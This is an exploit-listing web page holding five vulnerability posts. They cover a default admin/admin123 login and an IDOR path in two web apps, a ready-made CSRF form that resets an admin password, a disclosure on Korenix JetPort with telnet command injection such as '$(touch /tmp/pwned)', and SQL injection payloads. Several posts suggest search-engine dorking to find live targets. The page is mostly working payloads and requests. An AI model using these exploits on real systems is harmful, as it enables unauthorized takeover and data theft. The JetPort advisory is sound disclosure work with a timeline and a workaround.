Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : Covid-19 Directory on Vaccination System v1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin & pass = admin123 [+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/ Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : Bhojon restaurant management system v2.8 IDOR Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.bdtask.com/restaurant-management-system.php#live_demo | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface. [+] use payload : /dashboard/autoupdate [+] https://www/127.0.0.1/tacoturkco/dashboard/autoupdate Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>============================================================================================================================================= | # Title : AccPack Khanepani v1.0 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : http://webpay.com.np/#Product | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following HTML code modifies the admin information. [+] Go to the line 5. Set the target site link Save changes and apply . [+] infected file : cms/user/modify.php. [+] save code as poc.html [+] payload : </head> <body> <div class="container"> <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div> <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST" enctype="multipart/form-data"> <div hidden="true"> <input type="text" name="id" id="id" value="1"> </div> <div> <label for='email'>Email</label><input type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz"> </div> <div> <label for='password'>Password</label><input type="text" class="form-control" name='password' id='password' type='password' value="123456"> </div> <tr> <div> <label for='status'>Status</label> <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label> </div> <div style='height:80'> <input type='submit' value='Submit'><input type='reset' Value='Reset'> </div> </form> </div> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>CyberDanube Security Research 20240805-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities in JetPort Series product| Korenix JetPort Series vulnerable version| 1.2 fixed version| None CVE number| CVE-2024-7395, CVE-2024-7396, CVE-2024-7397 impact| High homepage| https://www.korenix.com/ found| 2024-04-01 by| S. Dietz (Office Vienna) | CyberDanube Security Research | Vienna | St. Pölten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market- oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines [...]. Our products are mainly applied in SMART industries: Surveillance, Machine-to- Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners. [...]" Source: https://www.korenix.com/en/about/index.aspx?kind=3 Vulnerable versions ------------------------------------------------------------------------------- Korenix JetPort 5601v3 / v1.2 Vulnerability overview ------------------------------------------------------------------------------- 1) Insufficient Authentication (CVE-2024-7395) The configuration service on port 600/tcp doesnt require authentication to be used. This allows an attacker to change the password or other critical information. 2) Plaintext Communication (CVE-2024-7396) The communication of the configuration service is transmitted in plain text. An attacker could use this information to sniff passwords or other critical information. 3) Unauthenticated Command Injection (CVE-2024-7397) An attacker with network access an can execute arbitrary commands as root user via the management service on port 600/tcp. Proof of Concept ------------------------------------------------------------------------------- 1) Insufficient Authentication (CVE-2024-7395) The management software JetPort Commander is used as an frontend for the telnet service on 600/tcp. While it is possible to set a password, the passwords gets sent to the software in cleartext and gets validated on the client software rather than on the device. An attacker can bypass the management software by using telnet to directly connect to the port. This allows him to reconfigure the device including passwords and access controls. $ telnet 192.168.122.76 600 Trying 192.168.122.76... Connected to 192.168.122.76. Escape character is '^]'. -> setpassword poc target:/$ cat /tmp/com2ip.conf version:1.2.0 model:JetPort5601v3 name:JetPort5601v3-DEFAULT serialno:0000000000000000 password:poc switchmode:redundant network:static:192.168.122.76:192.168.10.1:192.168.10.1 2) Plaintext Communication (CVE-2024-7396) The management service uses telnet as protocol. We used tcpdump to inspect the traffic during a password change. The new password (newpass) is readable during transmission. # sudo tcpdump -i virbr0 dst port 600 -X 14:17:25.461197 IP 192.168.122.240.49600 > 192.168.122.76.600: Flags [P.], seq 0:21, ack 13, win 16422, length 21       0x0000: 4500 003d 16a7 4000 8006 6d86 c0a8 7af0 E..=..@...m...z.       0x0010: c0a8 7a4c c1c0 0258 522b 6096 12eb 337d ..zL...XR+`...3}       0x0020: 5018 4026 76bd 0000 7365 7470 6173 7377 P.@&v...setpassw       0x0030: 6f72 6420 6e65 7770 6173 730d 0a ord.newpass.. 3) Unauthenticated Remote Code Execution (CVE-2024-7397) The management service on port 600/tcp is used to configure JetPort devices over the network. An attacker can inject arbitrary commands in multiple settings options. The binary ser2net receives the data via the telnet protocol and translates it to arguments for system() calls. For our PoC we used the setsntp option to create the file /tmp/pwned. $ telnet 192.168.122.76 600 Trying 192.168.122.76... Connected to 192.168.122.76. Escape character is '^]'. -> setsntp pool.ntp.org$(touch /tmp/pwned),123,Asia/Taipei,1 OK -> target:/$ ls -rtlha /tmp/ drwxrwxr-x 17 root 0 1.0k Apr 4 10:41 .. -rw-r--r-- 1 root 0 4 Apr 4 12:28 thttpd.pid -rw-r--r-- 1 root 0 712 Apr 4 12:29 com2ip.conf -rw-r--r-- 1 root 0 0 Apr 4 12:33 pwned ------------------------------------------------------------------------------- The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- None. Device is End-of-Life. Workaround ------------------------------------------------------------------------------- Limit the access to the device and place it within a segmented network. Recommendation ------------------------------------------------------------------------------- CyberDanube recommends customers from Korenix to remove the device from their network topology. Contact Timeline ------------------------------------------------------------------------------- 2024-04-08: Contacting Beijer Electronics Group via cs@beijerelectronics.com. 2024-05-07: Received confirmation that the issue is beeing looked into. 2024-06-10: Contact stated that the product is considered EoL and will no longer receive security updates. 2024-06-10: Confirm receipt and telling them that we will publish the advisory after our 90-days deadline. 2024-08-05: Publication of the Advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF Sebastian Dietz / @2024 </code></pre>

<pre><code>## Titles: eduAuthorities-1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 07/29/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The editid parameter appears to be vulnerable to SQL injection attacks. The payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each submitted in the editid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Additionally, the payload (select*from(select(sleep(20)))a) was submitted in the editid parameter. The application took 20011 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay.The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Exploits: - SQLi Multiple: ```mysql --- Parameter: #1* (URI) Type: boolean-based blind Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488 OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)# UiVZfrom(select(sleep(3)))a) Type: UNION query Title: MySQL UNION query (random number) - 3 columns Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962 UNION ALL SELECT 8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a) --- ``` ## Reproduce: [href](https://www.patreon.com/posts/eduauthorities-1-109562178) ## More: [href]( https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html) ## Time spent: 00:37:00 </code></pre>